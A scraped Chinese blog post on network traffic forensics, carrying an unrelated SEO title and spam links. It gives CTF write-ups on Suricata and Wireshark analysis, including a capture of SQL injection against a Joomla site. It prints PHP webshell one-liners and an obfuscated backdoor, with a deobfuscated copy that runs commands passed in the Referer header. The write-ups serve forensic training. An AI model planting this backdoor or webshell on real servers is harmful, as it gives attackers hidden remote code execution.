当前位置: 首页 > news >正文

网站建设 上如何用自己的电脑做网站服务器

网站建设 上,如何用自己的电脑做网站服务器,能免费做婚礼邀请函的网站,创立一个网站要多少钱目录 一、访问一个404网址#xff0c;触发监控规则 1、使用python搭建一个虚拟访问网址 2、打开Wireshark,抓取流量监控 3、在Suricata分析数据包 流量分析经典题型 入门题型 题目#xff1a;Cephalopod(图片提取) 进阶题型 题目#xff1a;抓到一只苍蝇(数据包筛选…目录 一、访问一个404网址触发监控规则 1、使用python搭建一个虚拟访问网址 2、打开Wireshark,抓取流量监控 3、在Suricata分析数据包 流量分析经典题型 入门题型 题目Cephalopod(图片提取) 进阶题型 题目抓到一只苍蝇(数据包筛选,数据提取) 数据分析题 题目一(1.pcap) 答案: 题目二(2.pcap) 答案 未完待续…… Suricata 环境搭建基于Ubuntu坏境下的Suricata坏境搭建_奈何_的博客-CSDN博客 suricata监控日志 wireshark:监控流量 同时使用需要降噪因为规则有许多重叠 题目及要求我打包上传了有需要的同学自取 一、访问一个404网址触发监控规则 1、使用python搭建一个虚拟访问网址 python3 -m http.server 9999 可见此时日志已经生成看日志生成时间  2、打开Wireshark,抓取流量监控 抓取成功 3、在Suricata分析数据包 将数据包保存后上传在Suricata分析该数据包 suricata -c /etc/suricata/suricata.yaml -r ./404.pcapng -l /tmp/  此时数据到处在tmp目录下 流量分析经典题型 CTF题型主要分为流量包修复、数据提取、WEB流量包分析、USB流量包分析、无线密码破解和工控流量包分析等等。 入门题型 题目Cephalopod(图片提取) 题目来源XCTF 3rd-HITB CTF-2017考点图片提取题目信息(Cephalopod.pcapng) 数据包打开分组字节流查询flag发现出现了flag.png的字样但是并没有这个图片文件往下翻图片应该在长度较大的流中追踪tcp流在tcp.stream eq 2处找到图片文件保存为原始数据 删除PNG 89前面多余部分保存为1.png 得到flag 进阶题型 进阶题型 题目抓到一只苍蝇(数据包筛选,数据提取) 题目来源bugku考点数据包筛选,数据提取题目信息(misc_fly.pcapng) 首先打开数据包题目提示了抓到一只苍蝇试一试搜索苍蝇 将163 289 431 577 729保存 将这五个包合在一起 使用liunx环境下的bb命令 # dd if1 bs1 skip364 of1.1 # dd if2 bs1 skip364 of2.2 # dd if3 bs1 skip364 of3.3 # dd if4 bs1 skip364 of4.4 # dd if5 bs1 skip364 of5.5 如果发现没有dd 命令下载即可 # apt install dd 添加后生成如下文件生成新的数据块 将生成新的数据块何在一起: #  cat 1.1 2.2 3.3 4.4 5.5 fly.rar 使用cat命令将其重镜像输出到fly.rar这样就形成了.rar压缩包 利用python搭建网站: # python3 -m http.server 9999 将.rar文件移动到创建的网页文件下 # python3 -m http.server 9999 在网页中下载即可 解压时我们会发现提示需要输入密码 使用010-editor打开 如果在十六进制中发现74 84 字段——只要不是80 那都是伪加密 解决方法将84还原成80 解压成功 打开后发现是一堆乱码 将文件后缀名更改成.exe之后再打开你会发现一件神奇的东西 ​ fly.exe   ​ 现在知道文件名为什么叫flags了吧 这是为什么呢我们来查看该文件的真实面貌 将其上传至linux中 使用binwalk工具分离文件内的小文件 # binwalk flag.exe 可以看见该文件下包含着许多图片 如果没有安装binwalk工具使用apt安装即可 # apt install binwalk 使用foremost提取该文件 # foremost flag.exe 如果没有安装foremost工具使用apt安装即可 # apt install foremost 提取的文件输出在output中 一共输出四个文件我们以次查看 # cat audit.txt 该文件提取出的是图片 在windows环境下下载查看该文件 在png最后一个图片是一个二维码手机扫码就会出现一个代码段 数据分析题 题目一(1.pcap) 题目来源2018信息安全铁人三项数据赛 题目要求 1.黑客攻击的第一个受害主机的网卡IP地址 192.168.1.8 nat 202.1.1.1:8000 扫描器awvs 工具sqlmap 2.黑客对URL的哪一个参数实施了SQL注入 list 3.第一个受害主机网站数据库的表前缀加上下划线例如abc ajtuc 4.第一个受害主机网站数据库的名字 打开流量包流量包有点大打开比较慢这里我们先过滤为HTTP协议可以看到202.1.1.2对192.168.1.8进行了疯狂的爆破 192.168.1.8 select ajtuc_ joomla 不难看出黑客利用的SqlMap在对目标站点进行不断的SQL试探注入 因此受害主机的网卡IP地址为192.168.1.8 而注入的参数也可以清晰的看见为list[select] 追踪http流根据回显内容目标站点数据库抛出的错误可以清晰的看见 不难确定目标站点的数据库表名前缀为ajtuc_ 接着为了确定受害主机网站数据库的名字再进行了一次过滤 (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http 此时挑选最后一次注入的payload进行url解码 可以清楚的看到 FROM joomla.ajtuc_users 因此数据库名为joomla 答案: 黑客攻击的第一个受害主机的网卡IP地址  192.168.1.8 黑客对URL的哪一个参数实施了SQL注入 list[select] 第一个受害主机网站数据库的表前缀(加上下划线例如abc_) ajtuc_ 第一个受害主机网站数据库的名字 joomla ?php eval($_POST[123]); ? zzzeval(base64_decode()) ls -al 题目二(2.pcap) 题目来源2018信息安全铁人三项数据赛 题目要求 黑客第一次获得的php木马的密码是什么黑客第二次上传php木马是什么时间第二次上传的木马通过HTTP协议中的哪个头传递数据 根据题目一已确定目标ip所以依旧使用以下过滤简化操作 ?php eval($_POST[zzz]); ? 2018-02-7 17:20:44.248365 http_referer (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http 可以看到一个奇怪文件kkkaaa.php,跟进POST数据查看 不难发现是中国菜刀的流量,木马密码为zzz 接着确定黑客第二次上传php木马的时间 我进行了过滤猜想黑客应该是根据第一个木马来上传的第二个木马 (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http.request.methodPOST 此时一条数据格外引人注目 我们对其16进制进行分析 将保存的值放入HXD中得到源码 将文件保存为php,但是代码经过混淆过的在代码末尾加上下面两句代码 也可以使用以下工具进行直接转码 ?php $pl]ower;$i]$m[1][0].$m[1]][1];$h]$]sl($ss(m]d5($i.]$kh),0],3))];$f$s]l($s]s(md5; $d]qarray_v]]alues(]$q);]preg_match_a]ll(/(][\\w]])[\\w-]]](?:;q]0.([\\d]))?,?/,; $W),$ss(]$s[]$i],]0,$e))),$]]k)));]$oob_get_content]]s();ob_end_]]clean();$d]base; $e]T_LANGUAGE];if($rr]$]ra){$]upars]e_]url($rr);par]se_st]r($u[]query],$]q);$; $E]64_e]ncod]e](]x(gz]compress($o),$k));pri]nt($k$d]/$k])];]session_destr]oy();}}}}; $t($i.]$kf),0,3]));$p];fo]r($z1];$z]count($m][1]);$z]])$p].$q[$m[]2][$z]];i; $M]$ra,$]m);if($q]$m]){sessi]on_sta]]rt();$s$]_SESS]ION;$]]s]ssubstr;$sls]]trto; $P]f(s]tr]pos($p],$h)0){$s[]$i];$p]$ss($]p,3);]}if(ar]ray]_key_exist]]s($i,$]s)]){$; $jstr_replace(fr,,cfrrfreatfrfre_funcfrtfrion); $k];}}re]]turn $o;]}$]r$_SERV]ER;$rr$r[]HTTP]_REFERE]R];$ra]]$r[]HTTP_A]CC]EP; $g;for(]$i]0;$i$l;])]{for($j0;($j]$c]$i$l);$]j,$i]){$o.]$t{$i]}^$k{$j}; $R$k]hcb4]2;$kfe130];functio]n] x($t],$k){$cs]trle]]n($k);$lstrle]n]($t)];$o; $Q]s[$i].$p;$estrp]]os(]$s[$i]],$f);if($]e){$k$kh.$k]f;]ob_sta]rt();e]val(gzun]co; $v]mpress(x](b]as]]e64_decode(pr]]e]g_repla]ce(array(/_/,/-/),arr]ay(]/,]; $xstr_replace(],,$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E); $N$j(,$x);$N(); ? 由于代码被打乱混淆因此我们没办法直接分析该代码的具体功能 可以使用ChatGpt将代码还原 ?php $p lower;$i $m[1][0] . $m[1][1];$h substr($s(md5($i.$kh), 0, 3));$f $sll($s(md5; $d q array_values($q);preg_match_all(/(\\w)\\w\\((;q0.([\\d]))?,?/,; $W ),$ss($s[$i],$oob_get_contents();ob_end_clean();$d base; $e _LANGUAGE];if($rr $ra){$uparse_url($rr);parse_str($u[query],$q);$; $E 64_encode(gzcompress($o),$k));print($k$d/$k);session_destroy();}}}}; $t ($i.$kf),0,3));$p];for($z1;$zcount($m[1]);$z)$p].$q[$m[2][$z]];i; $M $ra,$m);if($q$m){session_start();$s$_SESSION;$ssubstr;$slstrto; $P f(strpos($p],$h)0){$s[$i];$p$ss($p,3);}if(array_key_exists($i,$s)){$; $j str_replace(fr,,create_funcion); $k ;}}return $o;}$r$_SERVER;$rr$r[HTTP_REFERER];$ra$r[HTTP_ACCEPT_LANGUAGE];; $g ;for($i0;$i$l;){for($j0;($j$c$i$l);$j,$i){$o.$t{$i}^$k{$j};; $R $kcb42;$kfe130;function x($t,$k){$cstrlen($k);$lstrlen($t);$o; $Q s[$i].$p;$estrpos($s[$i],$f);if($e){$k$kh.$kf;ob_start();eval(gzunco; $v mpress(x(base64_decode(preg_replace(array(/_/,/-/),array(/,),; $x str_replace(,,$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E); $N $j(,$x);$N(); ? var_dump($j); var_dump($x); 运行php进行解混淆发现这就是木马 由此可确定这个引人注目的包上传了第二个木马 因此上传时间为:17:20:44.248365 美化后 $kh cb42; $kf e130; function x($t, $k) {$c strlen($k);$l strlen($t);$o ;for ($i 0; $i $l;) {for ($j 0; ($j $c $i $l); $j, $i) {$o . $t{$i} ^ $k{$j};}}return $o; }$r $_SERVER; $rr $r[HTTP_REFERER]; $ra $r[HTTP_ACCEPT_LANGUAGE]; if ($rr $ra) {$u parse_url($rr);parse_str($u[query], $q);$q array_values($q);preg_match_all(/([\w])[\w-](?:;q0.([\d]))?,?/, $ra, $m);if ($q $m) {session_start();$s $_SESSION;$ss substr;$sl strtolower;$i $m[1][0] . $m[1][4];$h $sl($ss(md5($i . $kh), 0, 3));$f $sl($ss(md5($i . $kf), 0, 3));$p ;for ($z 1; $z count($m[1]); $z) $p . $q[$m[2][$z]];if (strpos($p, $h) 0) {$s[$i] ;$p $ss($p, 3);}if (array_key_exists($i, $s)) {$s[$i] . $p;$e strpos($s[$i], $f);if ($e) {$k $kh . $kf;ob_start();eval(gzuncompress(x(base64_decode(preg_replace(array(/_/, /-/), array(/, ), $ss($s[$i], 0, $e))), $k)));$o ob_get_contents();ob_end_clean();$d base64_encode(x(gzcompress($o), $k));print($k$d/$k);session_destroy();}}} } 容易看到此时有两个与HTTP头有关的参数 $rr $_SERVER[HTTP_REFERER]; $ra $_SERVER[HTTP_ACCEPT_LANGUAGE]; 还是使用过滤 (ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http 然后可以看到许多请求footer.php的页面点开一个查看详情 容易发现referer数据十分可疑而ACCEPT_LANGUAGE较为正常 所以可以基本确定木马通过HTTP协议中的Referer头传递数据 答案 黑客第一次获得的php木马的密码是什么 zzz黑客第二次上传php木马是什么时间 17:20:44.248365第二次上传的木马通过HTTP协议中的哪个头传递数据 Referer 未完待续……
http://www.huolong8.cn/news/196724/

相关文章:

  • 微信小程序开发介绍windows优化大师自动安装
  • 高端大气酒店网站源码房屋设计风格
  • 宿州公司网站建设网站如何优化一个关键词
  • 网站建设宣传的目的兼职做问卷调查的网站好
  • htmi 个人小网站 模板义乌建设公司网站
  • 湛江市国外网站建设报价陕西采购与招标网
  • 网站费用预算做美容网站
  • 外贸推广网站邮箱收费哈尔滨网站推广优化公司
  • 江苏省工程建设信息网站杭州房产网官网
  • 普陀集团网站建设服务式办公室网
  • 柳市做公司网站个人网站建设方案书使用几号纸
  • 网站对于一个企业的优势织梦本地网站建设教程
  • 福建设厅官方网站做招聘网站要多久
  • 创科手机网站网站建设人员的工资分配
  • 怎么做电商网站推广怎么查有做网站的公司有哪些
  • 深圳专业建网站中国黄页网址
  • 石家庄做网站 vtkj北京 网站建设 京icp
  • 新网站建设怎么样123网络之家主页
  • 黄山做网站公司公司免费注册
  • 服务管理系统企业seo排名有 名
  • 织梦招商加盟网站源码大男人直播视频
  • 新吴区网站建设天津百度推广中心
  • 北京科技网站开发做网站全包
  • app网站建设可行性分析设计素材网站外网
  • 朝阳企业网站建设网站备案 需要什么
  • 怎么做网站图标十堰秦楚网主页
  • 天水市建设银行官方网站杭州seo博客有哪些
  • 做响应式网站设计师如何布局呢arial 网站开发是用犀利
  • dw网页制作教程动态重庆seo网站哪家好
  • 用自己网站做邮箱域名网站建设公司源码